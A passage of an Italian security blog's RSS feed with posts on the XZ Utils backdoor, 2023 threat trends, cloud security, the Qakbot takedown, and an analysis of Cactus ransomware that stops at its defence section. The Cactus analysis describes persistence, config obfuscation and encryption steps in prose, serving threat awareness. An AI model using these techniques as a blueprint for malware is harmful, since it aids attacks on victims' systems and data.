è stato loro assegnato un identificativo CVE-2024-3094 con punteggio di gravità 10,0, indicando un rischio estremamente alto.
Solo qualche settimana fa è stato rilasciato il codice per estrarre e innescare la backdoor, nascondendolo in file di test per verificare il funzionamento di XZ Utils.&lt;/p&gt;

&lt;p&gt;Di seguito due tabelle con i dispositivi che sono e non sono stati affetti dalle versioni rilasciate:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/compromissione-linux/tabella-affetti.png&#34; alt=&#34;Tabella dispositivi affetti&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/compromissione-linux/tabella-non-affetti.png&#34; alt=&#34;Tabella dispositivi non affetti&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Qualche giorno dopo il rilascio del codice, uno sviluppatore software di Microsoft, &lt;strong&gt;Andres Freund, ha rilevato prestazioni rallentate nella connessione SSH a un server remoto;&lt;/strong&gt; nello specifico, i login SSH stavano consumando troppa CPU e hanno generato degli errori in seguito ad analisi con Valgrind, una Linux utility per il monitoraggio della memoria. In seguito a questa rivelazione Freund continua le sue indagini e scopre che è stata inserita una backdoor alla base della libreria XZ.&lt;/p&gt;

&lt;h2 id=&#34;conclusione&#34;&gt;Conclusione&lt;/h2&gt;

&lt;p&gt;Allo stato attuale è presente una Proof of Concept (PoC) di questa vulnerabilità: la remediation più efficace risulta essere il revert alle versioni precedenti, mentre gli sviluppatori Debian hanno optato per ricostruire l&amp;rsquo;intero sistema prima delle commit critiche.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Almanacco 2023: Eventi e Considerazioni</title>
         <link>https://blog.cybergon.com/posts/almanacco-2023/</link>
         <pubDate>Wed, 20 Dec 2023 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/almanacco-2023/</guid>
         <description>

&lt;p&gt;L’almanacco era il luogo in cui i cammelli effettuavano lo scarico e il carico delle merci. Nel nostro Almanacco, in maniera non dissimile, trattiamo le evidenze dell’anno appena trascorso e le tendenze di quello venturo.&lt;/p&gt;

&lt;p&gt;Gli attacchi continuano a crescere anno su anno sia a livello globale, sia sul territorio italiano e sia in termini di varietà, che di quantità. In Italia gli attacchi di criticità elevata registrati nei primi 6 mesi sono 91, vale a dire che il belpaese &lt;strong&gt;ha visto una crescita del 40% rispetto all’anno precedente&lt;/strong&gt; e del 300% se si considerano gli ultimi 5 anni.&lt;br /&gt;
Questo emerge da report quale il Clusit o l’ENISA Threat Landscape, entrambe nelle versioni di ottobre 2023 che vanno ad indagare il primo semestre dell’anno in corso.&lt;/p&gt;

&lt;p&gt;Possiamo dirci lontani globalmente e in maniera particolare sul nostro territorio da un livello adeguato di protezione dal cyber crime; tuttavia, bisogna considerare che il numero sempre crescente degli attacchi informatici possa essere correlato anche a un maggior e miglior livello di tracciamento dovuto a tecnologie più all’avanguardia e diffuse, sì nei centri di ricerca ma soprattutto nelle aziende medie e grandi che stanno adeguando i livelli di investimento al rischio concreto.
Bisogna quindi riconoscere che il livello di consapevolezza stia gradualmente aumentando, ma che probabilmente il &lt;strong&gt;&lt;em&gt;gap&lt;/em&gt;&lt;/strong&gt; rispetto al tasso di crescita delle aziende del cyber crime e dei loro attacchi è ancora molto, troppo, importante.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Malware, Vulnerabilità (note e 0-day) e Phishing&lt;/strong&gt; si confermano tra le tipologie di attacco più utilizzate, seguite da DDoS e via via le restati categorie di attacco, come quelli con tecniche multiple, attacchi web o furto di identità.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2023/almanacco-2023.png&#34; alt=&#34;Almanacco 2023 cybergon&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;il-2023-cloud-ai-e-modelli-di-business&#34;&gt;Il 2023: cloud, AI e modelli di business&lt;/h2&gt;

&lt;p&gt;Avendo visto come si è mosso l’andamento a livello di scenario, proponiamo un’analisi su quelli che sono stati gli insight del 2023 e cosa possiamo aspettarci dal 2024.&lt;/p&gt;

&lt;p&gt;L’&lt;strong&gt;&lt;em&gt;hot topic&lt;/em&gt;&lt;/strong&gt; del momento è ovviamente l’AI con le sue sfaccettature e tutti i dibattiti che si porta dietro. Sorvoliamo sulle questioni etiche e andiamo dritti al punto ragionando su come l’utilizzo delle intelligenze artificiali possa aver facilitato l’attacco e la difesa.
L’incremento dei chatbot AI ha avuto un impatto sul panorama delle minacce cyber. L’adozione esponenziale di chatbot generativi da parte degli utenti ha ulteriormente contribuito a far “abbassare la guardia” su condivisioni di dati, password e informazioni sensibili.
Un rischio riguarda la possibilità che i cyber criminali possano manipolare i sistemi di AI per eludere le misure di sicurezza e di conseguenza esfiltrare dati condivisi.
Come abbiamo detto, nel 2023 il phishing ha mantenuto il suo ruolo da protagonista grazie anche alla comparsa AI, il cui utilizzo ha reso le campagne phishing più difficili da riconoscere dall’utente, avendo l’intelligenza artificiale eliminato gli errori linguistici grossolani tipici delle comunicazioni malevole.
Infine, è stata sfruttata per creare codice malevole o individuare e sfruttare vulnerabilità.
Per chi si occupa di difesa, invece l’intelligenza artificiale ha svolto un ruolo nella threat intelligence mediante l’analisi di documenti e informazioni utili e flussi di lavoro più snelli ed autonomi.&lt;/p&gt;

&lt;p&gt;Nonostante il &lt;strong&gt;Cloud&lt;/strong&gt; sembri un tema sdoganato anche in Italia, di fatto, il mercato, specialmente quello legato all’Hybrid Cloud, &lt;strong&gt;è cresciuto per tutto il 2023 del 24%&lt;/strong&gt; sancendo ufficialmente il sorpasso della nuvola sull’on premise (Fonte: Osservatorio Cloud Transformation Polimi).
L’adozione di strategie di difesa adeguate ha quindi comportato i primi grandi investimenti nell’anno appena trascorso e ci auguriamo che ci sarà un consolidamento in quello a venire, dal momento che il cloud risulta enormemente appetibile per l’ingente quantità di dati che vi circola e del ruolo che riveste nell’ambito di una strategia aziendale e gli attacchi sono sempre più maturi e impattanti.&lt;/p&gt;

&lt;p&gt;Malware e Ransomware nelle modalità &lt;strong&gt;&lt;em&gt;as a service&lt;/em&gt;&lt;/strong&gt; risultano tra le modalità di business più diffuse nel mercato del cyber crime. La possibilità, cioè, di acquistare pacchetti e usarli contro un target selezionato pur non avendo competenze tecniche ha ampliato di molto l’offerta e trovato grande riscontro già negli anni passati. Il 2023 ha visto consolidarsi questo modello con un focus su un particolare tipo di malware: l’Infostealer. Stealc, ad esempio, è un Infostealer apparso all’inizio dell’anno basato sui suoi parenti più anziani Raccoon, Vidar, Mars e Redline e ha come obiettivo l’esfiltrazione di dati sensibili dal web, portafogli di criptovalute e dati di account di app come Outlook e Telegram, con capacità di recuperare anche file degli impiegati delle aziende colpite.
Gli Infostealer non rappresentano esattamente una novità, ma stiamo assistendo a una evoluzione preoccupante del modello di business che sta dando luogo anche a una verticalizzazione del mercato. Una crescente specializzazione dà vita anche a “partnership” tra gruppi criminali che a loro volta generano versioni sempre più complesse e difficili da individuare di malware che possono colpire anche moltissime aziende in contemporanea.
Il successo di questa evoluzione risiede nei profitti derivanti dagli attacchi: i set di dati esfiltrati sono numerosissimi e valgono moltissimo, tanto che i forum specializzati nel dark web stanno esplodendo.&lt;/p&gt;

&lt;h2 id=&#34;cosa-aspettarci-dal-2024&#34;&gt;Cosa aspettarci dal 2024&lt;/h2&gt;

&lt;p&gt;Se da un lato l’AI legata a chatbot generativi ha trovato sempre più spazio, dall’altro c’è un oceano inesplorato di potenzialità e potenziali rischi legati al machine learning e all’intelligenza artificiale che potremmo dover navigare proprio nel 2024. Tra questi sicuramente è da menzionare il deep fake, ormai noto e largamente utilizzato sui social con pagine dedicate a personaggi famosi protagonisti di video improbabili (ad esempio Gerry Scotty nei panni di Freddie Mercury).
Potremmo quindi assistere all’utilizzo di deep fake pericolosi legati a personalità di spicco del mondo politico – non possiamo ignorare che i conflitti attualmente in corso comportino anche una grande e complessa guerra cibernetica – o su privati, minori, personaggi famosi.
Le tecnologie di protezione devono quindi crescere di pari passo e specializzarsi sempre più sulla &lt;strong&gt;&lt;em&gt;deep fake detection&lt;/em&gt;&lt;/strong&gt; affinché le aziende siano pronte ad affrontare la minaccia.&lt;/p&gt;

&lt;p&gt;Come dicevamo, i due conflitti principali a cui stiamo drammaticamente assistendo comportano una guerra cibernetica che incrementa una tipologia di attacchi molto specifica: &lt;strong&gt;state-sponsored e hacktivism.&lt;/strong&gt;
Possiamo prevedere che l’instabilità geopolitica continuerà ad alimentare gli attacchi DDoS, le fughe di dati, gli attacchi di defacing e altri, e che le motivazioni alla base dell’hacktivismo diventeranno sempre più complesse e labili, confondendo il confine tra politica e business e colpendo obiettivi civili e militari.
Potremmo inoltre assistere alla tentata compromissione di eventi importanti come le elezioni in USA, quelle europee o le olimpiadi estive di Parigi.
Anche per queste ragioni, la cyber security sta sempre più entrando nelle agende politiche di tutte le nazioni e dei continenti che implementano regolamentazioni sempre più severe, dando mandato ad aziende e organizzazioni governative di attuare politiche stringenti sulla protezione dei dati e dei sistemi.
Queste regolamentazioni andranno di pari passo con processi specifici e un approccio olistico alla sicurezza nelle aziende, che si trovano ora a fare i conti anche con uno skills shortage importante. Tematiche quali zero-trust e DevSecOps andranno via via a integrarsi con tutti gli strumenti e piattaforme che un’organizzazione possiede. Questo comporta la necessità di avere uno o più facilitatori interni che si facciano carico di questo cambiamento e il 2024 potrebbe essere l’anno per muovere alcuni passi in questa direzione.&lt;/p&gt;

&lt;p&gt;È innegabile che la cultura della cybersecurity si stia diffondendo nelle aziende. Questo porta maggior consapevolezza rispetto ai processi, alle tecnologie e alle risorse da mettere in campo che permettono un recupero più veloce in caso di attacco informatico. Tuttavia, gli sforzi che si stanno facendo in media non sono ancora sufficienti e lo dimostra il fatto che sì, le aziende ci mettono meno tempo a risollevarsi ma continuano sempre più frequentemente a essere vittima di attacchi. Inoltre, l’offesa sta cambiando paradigma: l’obiettivo sembra essere sempre meno il fermo dell’azienda e sempre più l’esfiltrazione di dati, ciò che c’è di più prezioso nell’organizzazione.
La cosa molto interessante è che alcuni attacchi informatici iniziano a chiedere riscatti molto convenienti se paragonati al ripristino dei sistemi. Nel 2024 potremmo assistere a un rafforzamento di questo modello di business.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Cloud Security: le best practice di sicurezza per la nuvola</title>
         <link>https://blog.cybergon.com/posts/cloud-security-best-practice/</link>
         <pubDate>Wed, 08 Nov 2023 10:36:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cloud-security-best-practice/</guid>
         <description>

&lt;p&gt;Gli attacchi sono cresciuti e sono sempre più complessi. Lo rilevano i dati ma anche l’esperienza di chi fa della sicurezza informatica il proprio mestiere.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cloud-security(2)/cloud-secuirty-1.png&#34; alt=&#34;cloud-security&#34; /&gt;
Fonte: Clusit&lt;/p&gt;

&lt;p&gt;Mentre il cyber crimine si muove come una grande impresa, o meglio, come un insieme di tante imprese, le aziende del nostro territorio subiscono attacchi che hanno enormi impatti sull’operatività aziendale e quindi sul business.&lt;/p&gt;

&lt;p&gt;Phishing, malware e vulnerabilità rimangono tra i vettori di attacco più utilizzati, ma anche quelli &lt;strong&gt;cloud-based&lt;/strong&gt; trovano spazio e sono &lt;strong&gt;aumentati del 48%&lt;/strong&gt; su scala globale (Check Point Research).
Nonostante si senta abbondantemente parlare di security by design in riferimento all’approccio al cloud, sentiamo il bisogno di sfatare questo mito in questo articolo.&lt;/p&gt;

&lt;h1 id=&#34;quali-sono-allora-i-maggiori-rischi-di-sicurezza-informatica-quando-si-parla-di-cloud&#34;&gt;Quali sono allora i maggiori rischi di sicurezza informatica quando si parla di cloud?&lt;/h1&gt;

&lt;p&gt;Il cloud risulta enormemente appetibile per via dell’ingente quantità di dati presenti negli applicativi e del ruolo spesso strategico che riveste nell’ambito di una infrastruttura aziendale.&lt;/p&gt;

&lt;h2 id=&#34;visibilità-end-to-end&#34;&gt;Visibilità End to end&lt;/h2&gt;

&lt;p&gt;Essere in grado di &lt;strong&gt;mappare il proprio parco applicativo&lt;/strong&gt; e conoscere quali sono le attività che vengono svolte quotidianamente, permette di riconoscere quali sono, invece, le attività sospette e malevole.&lt;/p&gt;

&lt;p&gt;Non sempre i cybercriminali sfruttano nell’immediato una vulnerabilità. Molto spesso possono rimanere silenti per settimane (tra le 2 e le 6 settimane) prima di procedere con l’attacco vero e proprio, questo perché, studiando l’infrastruttura della vittima è possibile conoscere meglio i punti di debolezza da poter sfruttare. Essere in grado di riconoscere i movimenti sospetti permette di agire in tempo ed evitare che l’attacco informatico vada a buon fine o si propaghi e che il business venga impattato in maniera irreversibile.&lt;/p&gt;

&lt;p&gt;Il monitoraggio interno deve essere una priorità: avere una &lt;strong&gt;visibilità end to end&lt;/strong&gt; di tutte le attività che vengono svolte interamente e la successiva lettura di tali attività da parte di persone competenti permette una &lt;strong&gt;gestione efficace dell’infrastruttura stessa&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Tale lettura deve riguardare tutto il parco applicativo per avere sempre ben chiaro lo stato in cui la propria infrastruttura si trova con le relative attività che vengono svolte, in modo da avere sempre sotto controllo ciò che avviene internamente.&lt;/p&gt;

&lt;p&gt;Un altro aspetto importante riguarda la valutazione del rischio che deve essere svolto insieme al proprio SOC per poter capire quali sono i momenti più adatti per svolgere attività di ricognizione e identificazione delle attività sospette da parte di entità non autorizzate ad accedere al cloud.&lt;/p&gt;

&lt;p&gt;Avere un presidio &lt;sup&gt;24&lt;/sup&gt;&amp;frasl;&lt;sub&gt;7&lt;/sub&gt; sull’infrastruttura garantisce una raccolta di indizi sulle attività svolte e l’azione nel minor tempo possibile in caso di riconoscimento di attività malevole.&lt;/p&gt;

&lt;h2 id=&#34;gestione-delle-vulnerabilità&#34;&gt;Gestione delle vulnerabilità&lt;/h2&gt;

&lt;p&gt;Partendo dal presupposto che nessuna azienda è impenetrabile e ogni azienda può presentare delle falle nel proprio sistema, bisogna quindi porre l’attenzione sull’&lt;strong&gt;analisi e sulla gestione delle vulnerabilità&lt;/strong&gt; affinché queste non vengano sfruttate attivamente.&lt;/p&gt;

&lt;p&gt;Questo processo, valido per ogni tipo di infrastruttura, deve essere programmato in maniera ancora più puntigliosa quando si parla di cloud.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;controllo attivo delle vulnerabilità&lt;/strong&gt; presenti all’interno del proprio sistema e dei propri applicativi deve avvenire in maniera costante e ricorsiva. Non basta quindi avere un piano di assessment delle vulnerabilità che avvenga una tantum, al contrario deve avvenire &lt;strong&gt;in maniera continuativa&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Un servizio di &lt;strong&gt;Continuous Vulnerability Assessment&lt;/strong&gt; permette di avere sotto controllo lo stato attuale della propria infrastruttura per riconoscere in real-time eventuali falle nel sistema e impostare un piano di remediation volto a rimediare tali falle tempestivamente.&lt;/p&gt;

&lt;p&gt;Secondo un &lt;a href=&#34;https://hub.cybergon.com/scarica-il-report-2&#34;&gt;report&lt;/a&gt; svolto internamente alla nostra azienda, i tempi di remediation per lo sfruttamento delle vulnerabilità critiche e con criticità alta si attesta tra i 95 giorni e i 100 giorni.
Vulnerabilità con diversi livelli di criticità hanno necessità di essere rimediate in tempi diversi: anche qualche giorno in più può risultare cruciale.
Non va poi trascurata l’attività di &lt;strong&gt;patch management&lt;/strong&gt;, ovvero quelle attività di controllo degli aggiornamenti del sistema operativo e il processo di implementazione degli aggiornamenti per ridurre l’esposizione ad attacchi informatici, garantire una continuità operativa e risolvere vulnerabilità della sicurezza.&lt;/p&gt;

&lt;p&gt;Quando si parla di vulnerabilità va anche considerata la configurazione dell’infrastruttura. Entra in gioco, quindi, il concetto di &lt;strong&gt;mis-configuration&lt;/strong&gt;, ovvero una non corretta o non appropriata configurazione dell’infrastruttura che, se non in linea con le esigenze del business, può portare allo sfruttamento della stessa da parte dei criminali informatici.&lt;/p&gt;

&lt;p&gt;Effettuare una valutazione della situazione dell’infrastruttura da un punto di vista della sicurezza informatica può essere utile da un lato per effettuare un’analisi dell’ambiente cloud, dall’altro per determinare il livello di sicurezza dello stesso. Una volta effettuata questa prima analisi possono essere messe in campo le best practice per rendere il proprio cloud il più sicuro possibile.&lt;/p&gt;

&lt;h2 id=&#34;protezione-avanzata&#34;&gt;Protezione avanzata&lt;/h2&gt;

&lt;p&gt;Come abbiamo visto precedentemente, il numero degli attacchi è in continuo aumento, così come la loro complessità. I cyber criminali affinano sempre più le proprie tecniche, tanto da non essere più in grado di classificare gli attacchi sotto una unica categoria. Secondo il rapporto Clusit 2023, infatti, circa &lt;strong&gt;il 24% degli attacchi sono di tipo sconosciuto&lt;/strong&gt;, proprio per la loro sempre più recente natura che non permette di catalogarli in categorie già esistenti.&lt;/p&gt;

&lt;p&gt;Le aziende, per difendersi anche da queste più recenti tipologie, hanno bisogno di sistemi altrettanto efficaci che si sviluppino di pari passo con l’evoluzione degli attacchi stessi.
La &lt;strong&gt;protezione del dato&lt;/strong&gt; deve diventare la priorità e con essa anche tutte le best practice legate al tema del back-up.&lt;/p&gt;

&lt;p&gt;In particolare, se prevenire un attacco informatico non è sempre possibile, quello che l’azienda può fare è di facilitare il recupero dei dati stessi. Il &lt;strong&gt;back up non è un sistema di protezione&lt;/strong&gt; dai cyber attacchi, ma permette all’azienda colpita di &lt;strong&gt;ripartire nel minor tempo possibile&lt;/strong&gt;.
Impostare una corretta strategia di difesa che consideri questi aspetti può assicurare l’identificazione degli attacchi e una rapida ripartenza.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>La fine di Qakbot: un nuovo Emotet?</title>
         <link>https://blog.cybergon.com/posts/la-fine-di-qabkot-nuovo-emotet/</link>
         <pubDate>Mon, 04 Sep 2023 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/la-fine-di-qabkot-nuovo-emotet/</guid>
         <description>&lt;p&gt;Qakbot, malware attivo dal 2008, è stata una minaccia per più di 15 anni, con continue evoluzioni volte ad eludere i controlli di rilevamento.
Qakbot è stato utilizzato come vettore di infezione durante diversi attacchi ransomware che hanno infettato &lt;strong&gt;oltre 700.000 computer&lt;/strong&gt; e causato danni per centinaia di milioni di dollari. Solo negli ultimi 18 mesi le perdite hanno superato i 58 milioni di dollari.
Nel corso degli anni Qakbot si è affiliato a numerose cyber gang, Conti, REvil e MegaCortex, annoverando tra le ultime anche Black Basta, di cui &lt;a href=&#34;https://blog.cybergon.com/posts/analisi-del-malware-qakbot/&#34;&gt;abbiamo parlato in uno dei nostri articoli&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;La botnet di Qakbot si è sviluppata attraverso &lt;strong&gt;un’infrastruttura di comando e controllo&lt;/strong&gt; composta da migliaia di computer utilizzati per sferrare attacchi contro individui e aziende in tutto il mondo, Italia compresa.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/fine-qakbot/come-funziona-qakbot.png&#34; alt=&#34;La fine di Qakbot&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Una lunga operazione guidata dall’FBI, a cui hanno preso parte Europol e forze dell’ordine di Francia, Germania, Olanda, Regno Unito, Romania e Lettonia e nota come &lt;em&gt;“Duck Hunt”&lt;/em&gt;, ne ha permesso la chiusura.
La notte del 29 agosto L’FBI, dopo essersi &lt;strong&gt;infiltrato nell’infrastruttura di Qakbot&lt;/strong&gt; e aver ottenuto il controllo di un computer utilizzato da un amministratore della cyber gang, ha definitivamente chiuso la botnet.&lt;/p&gt;

&lt;p&gt;Quello dell’FBi è un &lt;em&gt;modus operandi&lt;/em&gt; che ha preso piede con la (prima) chiusura di Emotet nel gennaio 2021, quando l’&lt;em&gt;&amp;ldquo;operazione Ladybird&amp;rdquo;&lt;/em&gt; aveva visto la cooperazione di Europol ed Eurojust oltre a diverse nazioni Europee, Canada e Stati Uniti.&lt;/p&gt;

&lt;p&gt;Durante Duck Hunt il traffico di Qakbot è stato &lt;strong&gt;reindirizzato ai server controllati dall’FBI&lt;/strong&gt;, che ha avuto così modo di accedere e distribuire un programma di disinstallazione sui dispositivi compromessi in tutto il mondo, eliminando l’infezione ed impedendo la distribuzione di ulteriori payload dannosi.
Le vittime sarebbero state ignare di questa disinstallazione fino a quando l’FBI non le ha informate tramite una notifica dell’accaduto.&lt;/p&gt;

&lt;p&gt;Secondo un’intervista &lt;a href=&#34;https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastructure-in-multinational-cyber-takedown&#34;&gt;rilasciata dal direttore Christopher Wray&lt;/a&gt;, l’FBI ha individuato molti file relativi al funzionamento di Qakbot. Tra i vari documenti, è stato trovato un file denominato “payments.txt” contenente l’elenco delle vittime del ransomware, con i dettagli del sistema informatico, le date e l’importo del pagamento avvenuto.&lt;/p&gt;

&lt;p&gt;&amp;ldquo;Qakbot era la botnet preferita da alcune delle più famigerate bande di ransomware, ma ora è stata eliminata. Questa operazione ha portato anche al sequestro di &lt;strong&gt;quasi 9 milioni di dollari in criptovaluta&lt;/strong&gt; da parte dell&amp;rsquo;organizzazione criminale informatica Qakbot, che ora sarà messo a disposizione delle vittime&amp;rdquo;, ha affermato il procuratore americano Martin Estrada.
La buona riuscita dell’operazione è stata colta ragionevolmente con entusiasmo dalle parti coinvolte, anche se ad oggi non sono stati effettuati arresti.&lt;/p&gt;

&lt;p&gt;Wray ha aggiunto che “Tutto questo è stato reso possibile dal lavoro dedicato dell’FBI di Los Angeles, dalla nostra Divisione Cyber presso la sede dell’FBI e dai nostri partner, sia qui che all’estero. La minaccia informatica che la nostra nazione deve affrontare sta diventando ogni giorno più pericolosa e complessa. Ma il nostro successo dimostra che la nostra stessa rete e le nostre stesse capacità sono più efficaci.”&lt;/p&gt;

&lt;p&gt;La vittoria su Quakbot potrebbe in qualche modo dover essere rivista se dovesse accadere quanto abbiamo già visto proprio con Emotet: solo 5 mesi dopo la chiusura della botnet, il malware è tornato – come si suol dire – più forte di prima e ad oggi è sempre più complesso.&lt;/p&gt;

&lt;p&gt;Qakbot potrebbe tornare, forse diversa, probabilmente migliore.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Analisi del ransomware Cactus</title>
         <link>https://blog.cybergon.com/posts/analisi-ransomware-cactus/</link>
         <pubDate>Thu, 29 Jun 2023 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Prosdocimi</author>
         
               
             <author>Jacopo Candido Augelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/analisi-ransomware-cactus/</guid>
         <description>

&lt;p&gt;A partire dal mese di marzo, alcuni ricercatori di cybersecurity hanno scoperto un &lt;strong&gt;nuovo ransomware&lt;/strong&gt; chiamato &lt;strong&gt;Cactus&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Cactus opera come la maggior parte dei ransomware, rubando i dati dai computer delle vittime prima che vengano crittografati, per poi rivenderli e/o chiedere un riscatto.
La caratteristica che lo distingue dagli altri malware è la progettazione pensata per superare i controlli di sicurezza grazie a &lt;strong&gt;tecniche di crittografia&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cactus/cactus-copertina.png&#34; alt=&#34;Cactus Ransomware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Se si volesse semplificare il suo funzionamento in una frase si potrebbe dire che Cactus crittografa se stesso; questo concetto, come vedremo nella parte di analisi, non è però propriamente corretto.&lt;/p&gt;

&lt;p&gt;Rispetto ai ransomware comuni, Cactus &lt;strong&gt;utilizza tecniche di crittografia&lt;/strong&gt; del suo stesso codice per ritardare il rilevamento all’interno del computer in cui sta operando e, quindi, muoversi in modo indisturbato più a lungo possibile, eludendo i controlli antivirus e di monitoraggio della rete. Un’altra caratteristica rilevante è la capacità di &lt;strong&gt;cambiare continuamente l’estensione&lt;/strong&gt; ai file presi di mira dal processo di crittografia: le estensioni utilizzate infatti sono numerose e cambiano in base allo stato in cui si trova il processo crittografico, rendendo quindi più difficile il riconoscimento.&lt;/p&gt;

&lt;h3 id=&#34;analisi-del-malware&#34;&gt;Analisi del malware&lt;/h3&gt;

&lt;p&gt;L’analisi è stata eseguita sulla base di diversi casi osservati in cui sono state riscontrate delle caratteristiche comuni.&lt;/p&gt;

&lt;p&gt;L’accesso iniziale dei threat actors si ottiene da un server VPN vulnerabile. Successivamente, viene creata una backdoor SSH al server C2 malevoli per mantenere l&amp;rsquo;accesso all’infrastruttura compromessa.&lt;/p&gt;

&lt;p&gt;Una volta all&amp;rsquo;interno della rete, i threat actors tentano di enumerare gli account locali e di rete e gli endpoint raggiungibili, prima di creare nuovi utenti e sfruttare script per automatizzare la diffusione e l’esecuzione del ransomware.
Per quanto riguarda il ransomware Cactus partiamo dal nome stesso del binario: esso ha lo stesso nome dell&amp;rsquo;ID della singola vittima che viene utilizzato per le negoziazioni e che, normalmente, è strutturato in regex [a-z1-9]{4}-[a-z1-9]{4} -[a-z1-9]{4}-[a-z1-9]{4}.exe, ad esempio “a12b-e4fg-c12g-zkc2.exe”, dove il nome prima dell’estensione è l’identificatore della vittima.&lt;/p&gt;

&lt;p&gt;L&amp;rsquo;eseguibile ha 3 modalità principali di esecuzione, che dipendono dalla flag passata da riga di comando.&lt;/p&gt;

&lt;h4 id=&#34;setup-mode&#34;&gt;Setup Mode&lt;/h4&gt;

&lt;p&gt;Questa modalità viene attivata passando il flag &amp;ldquo;-s&amp;rdquo; da riga di comando; il suo scopo è quello di creare una persistenza sulla macchina.
Come prima cosa Cactus copia il proprio file eseguibile in C:\ProgramData{Victim_ID}.exe.&lt;/p&gt;

&lt;p&gt;In seguito, viene generata una stringa con tre valori, insieme ad altri dati casuali. In particolare si trovano:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Path del file originale&lt;/li&gt;
&lt;li&gt;Una stringa base64 che è stata passata da riga di comando dopo la flag “-i”&lt;/li&gt;
&lt;li&gt;Eventuali argomenti rimanenti della riga di comando.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;La stringa è poi codificata in esadecimale, offuscata spostando di un carattere l&amp;rsquo;allineamento di ciascuna rappresentazione byte di due caratteri e, infine, scritta sul file C:\ProgramData\ntuser.dat.&lt;/p&gt;

&lt;p&gt;Nell’immagine seguente si può osservare come appare il file ntuser.dat dopo l’esecuzione del ransomware.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cactus/cactus-1.png&#34; alt=&#34;Cactus Ransomware&#34; /&gt;
Fonte: Kroll&lt;/p&gt;

&lt;p&gt;Una volta creato il file ntuser.dat, Cactus procede con la creazione e l&amp;rsquo;esecuzione di un task schedulato che esegue il comando C:\ProgramData{Victim_ID}.exe -r.&lt;/p&gt;

&lt;h4 id=&#34;read-configuration-mode&#34;&gt;Read Configuration Mode&lt;/h4&gt;

&lt;p&gt;Quando il task pianificato viene eseguito, il ransomware legge il file ntuser.dat ed estrae i tre valori.
Cactus elimina quindi il file eseguibile a cui si fa riferimento nel primo valore. Quindi genera un&amp;rsquo;altra istanza di se stesso, passando il secondo valore come parametro all&amp;rsquo;opzione &amp;ldquo;–i&amp;rdquo;. Infine aggiunge il terzo valore che contiene tutti gli argomenti rimanenti alla riga di comando.&lt;/p&gt;

&lt;p&gt;In questa modalità Cactus è eseguito senza i parametri “-s” e “-r”, passando quindi alla terza modalità.&lt;/p&gt;

&lt;h4 id=&#34;encryption-mode&#34;&gt;Encryption Mode&lt;/h4&gt;

&lt;p&gt;Quando il ransomware viene generato senza i parametri “-s” o “-r”, tenterà di cifrare il file system. Il malware decodifica una stringa esadecimale scritta nel codice sorgente.&lt;/p&gt;

&lt;p&gt;Dopo aver decodificato la stringa esadecimale, procede quindi a decifrare i dati risultanti, utilizzando l&amp;rsquo;algoritmo AES con il parametro &amp;ldquo;-i&amp;rdquo;. Il risultato viene usato come chiave RSA pubblica.&lt;/p&gt;

&lt;p&gt;Il malware crea più thread per cifrare i file presenti nel file system con il seguente schema:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Viene generata una chiave AES casuale per ogni file&lt;/li&gt;
&lt;li&gt;La chiave AES viene cifrata con la chiave RSA pubblica.&lt;/li&gt;
&lt;li&gt;Il file cifrato AES e la chiave AES cifrata RSA vengono salvati in un unico oggetto.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cactus/cactus-2.png&#34; alt=&#34;Cactus Ransomware&#34; /&gt;
Fonte: Kroll&lt;/p&gt;

&lt;p&gt;Il malware continua a crittografare i file fino al completamento.&lt;/p&gt;

&lt;p&gt;Una volta eseguiti, i file vengono aggiunti con l&amp;rsquo;estensione &amp;ldquo;cts\d&amp;rdquo; con l&amp;rsquo;ultimo carattere che è una cifra casuale. In seguito viene creata una “ransomware note” denominata &amp;ldquo;cAcTuS.readme.txt&amp;rdquo; con i dettagli su come la vittima può negoziare tramite la chat TOX.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/cactus/cactus-3.png&#34; alt=&#34;Cactus Ransomware&#34; /&gt;
Fonte: Kroll&lt;/p&gt;

&lt;h2 id=&#34;come-difendersi&#34;&gt;Come difendersi&lt;/h2&gt;

